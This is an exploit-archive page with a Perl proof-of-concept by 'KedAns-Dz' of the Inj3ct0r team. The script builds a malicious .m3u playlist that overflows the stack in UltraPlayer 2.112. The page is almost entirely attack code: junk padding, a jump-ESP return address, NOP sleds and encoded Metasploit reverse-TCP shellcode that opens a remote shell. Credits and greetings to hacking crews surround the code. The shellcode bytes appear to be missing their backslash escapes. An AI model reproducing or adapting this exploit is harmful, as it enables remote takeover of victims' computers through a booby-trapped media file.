Home / exploitsPDF  

UltraPlayer 2.112 Buffer Overflow

Posted on 24 January 2012

#!/usr/bin/perl
sub logo {
print STDERR << "EOF";

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /'  __ /'__` / \__ /'__` 0
0 /\_,  ___ /\_/\_   ___  ,_/ /  _ ___ 1
1 /_/  /' _ ` / /_/_\_<_ /'___  /    /`'__ 0
0   / /    /   / \__/  \_  \_   / 1
1  \_ \_ \_\_   \____/ \____\ \__\ \____/ \_ 0
0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1
1  \____/ >> Exploit database separated by exploit 0
0 /___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

EOF
}
####
# Title : UltraPlayer v2.112 (.m3u) Stack Buffer Overflow Exploit
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns
# platform : windows ( Local BOF )
# Type : local exploit / Buffer Overflow
#####

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
###

$junk = "x41" x 313; # Junk
$ret = "xeb".pack("V", 0x90471230)."x90x90"; # jump ESP / nop - uplayer.exe - /nop /nop
$nops = "x90" x 48; # n0ps
$acc = "x41" x 88; # buf
$shell = # win/shell_reverse_tcp | enc=alphaMiX | by : MSF
"x89xe2xd9xd0xd9x72xf4x5ax4ax4ax4ax4ax4ax4a" .
"x4ax4ax4ax4ax4ax43x43x43x43x43x43x37x52x59" .
"x6ax41x58x50x30x41x30x41x6bx41x41x51x32x41" .
"x42x32x42x42x30x42x42x41x42x58x50x38x41x42" .
"x75x4ax49x4bx4cx4bx58x4cx49x45x50x45x50x47" .
"x70x43x50x4bx39x5ax45x56x51x49x42x52x44x4c" .
"x4bx56x32x50x30x4ex6bx56x32x54x4cx4ex6bx51" .
"x42x54x54x4ex6bx43x42x45x78x56x6fx58x37x52" .
"x6ax45x76x56x51x49x6fx56x51x4bx70x4cx6cx47" .
"x4cx50x61x51x6cx43x32x56x4cx47x50x4bx71x5a" .
"x6fx54x4dx47x71x58x47x49x72x5ax50x50x52x43" .
"x67x4ex6bx51x42x54x50x4ex6bx51x52x45x6cx45" .
"x51x4ex30x4ex6bx51x50x51x68x4dx55x4bx70x50" .
"x74x51x5ax47x71x5ax70x52x70x4ex6bx51x58x54" .
"x58x4ex6bx52x78x47x50x47x71x4ex33x5ax43x45" .
"x6cx47x39x4cx4bx45x64x4ex6bx43x31x4ex36x54" .
"x71x49x6fx56x51x49x50x4ex4cx5ax61x58x4fx56" .
"x6dx45x51x49x57x50x38x4dx30x43x45x58x74x56" .
"x63x43x4dx4bx48x47x4bx51x6dx51x34x51x65x4b" .
"x52x56x38x4ex6bx56x38x54x64x56x61x58x53x45" .
"x36x4cx4bx56x6cx52x6bx4ex6bx52x78x45x4cx43" .
"x31x4bx63x4cx4bx47x74x4cx4bx43x31x5ax70x4d" .
"x59x50x44x54x64x45x74x43x6bx43x6bx51x71x52" .
"x79x50x5ax43x61x4bx4fx49x70x56x38x51x4fx52" .
"x7ax4ex6bx47x62x58x6bx4cx46x51x4dx51x78x56" .
"x53x56x52x47x70x47x70x50x68x52x57x51x63x54" .
"x72x43x6fx50x54x52x48x50x4cx51x67x54x66x43" .
"x37x4bx4fx58x55x4dx68x4cx50x45x51x45x50x43" .
"x30x54x69x58x44x56x34x50x50x45x38x45x79x4d" .
"x50x52x4bx43x30x4bx4fx4ex35x56x30x56x30x52" .
"x70x56x30x47x30x52x70x47x30x56x30x50x68x58" .
"x6ax56x6fx4bx6fx4bx50x49x6fx4bx65x4cx49x5a" .
"x67x52x48x51x6fx45x50x43x30x43x31x45x38x54" .
"x42x45x50x47x61x43x6cx4dx59x5ax46x52x4ax54" .
"x50x43x66x43x67x51x78x4fx69x49x35x52x54x50" .
"x61x4bx4fx49x45x50x68x50x63x50x6dx45x34x45" .
"x50x4cx49x49x73x52x77x52x77x50x57x50x31x5a" .
"x56x51x7ax45x42x52x79x43x66x4bx52x49x6dx50" .
"x66x49x57x50x44x47x54x45x6cx43x31x43x31x4c" .
"x4dx50x44x56x44x56x70x4fx36x47x70x52x64x51" .
"x44x50x50x50x56x52x76x43x66x50x46x51x46x50" .
"x4ex50x56x56x36x52x73x52x76x50x68x43x49x5a" .
"x6cx45x6fx4bx36x49x6fx49x45x4ex69x4dx30x52" .
"x6ex56x36x47x36x4bx4fx50x30x43x58x45x58x4b" .
"x37x47x6dx43x50x4bx4fx4ex35x4dx6bx5ax50x58" .
"x35x49x32x50x56x43x58x4fx56x4cx55x4dx6dx4d" .
"x4dx4bx4fx4ex35x45x6cx43x36x43x4cx54x4ax4b" .
"x30x49x6bx4dx30x54x35x54x45x4fx4bx43x77x54" .
"x53x43x42x52x4fx51x7ax45x50x52x73x4bx4fx58" .
"x55x41x41";

# Make m3u Ev!L Exploit
my $ked = "http://".$junk."/inj3ct0r.x".$ret.$acc."x90x90x90".$shell.$nops.".mp3";

open(F,'>> Inj3ct0r.m3u');
print F $ked;
close(F);

# sP^tHanX & Gr33tZ t0 : Omar (www.l3b-r1z.com) | And My fr!ndS 0n HMD ^___^ <3 <3

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================

 

TOP

Malware :

Exploits :